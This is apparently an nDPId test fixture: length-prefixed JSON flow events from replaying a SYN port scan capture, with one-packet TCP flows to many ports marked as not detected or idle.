+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1047,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1047,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5033,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5051,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5051,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 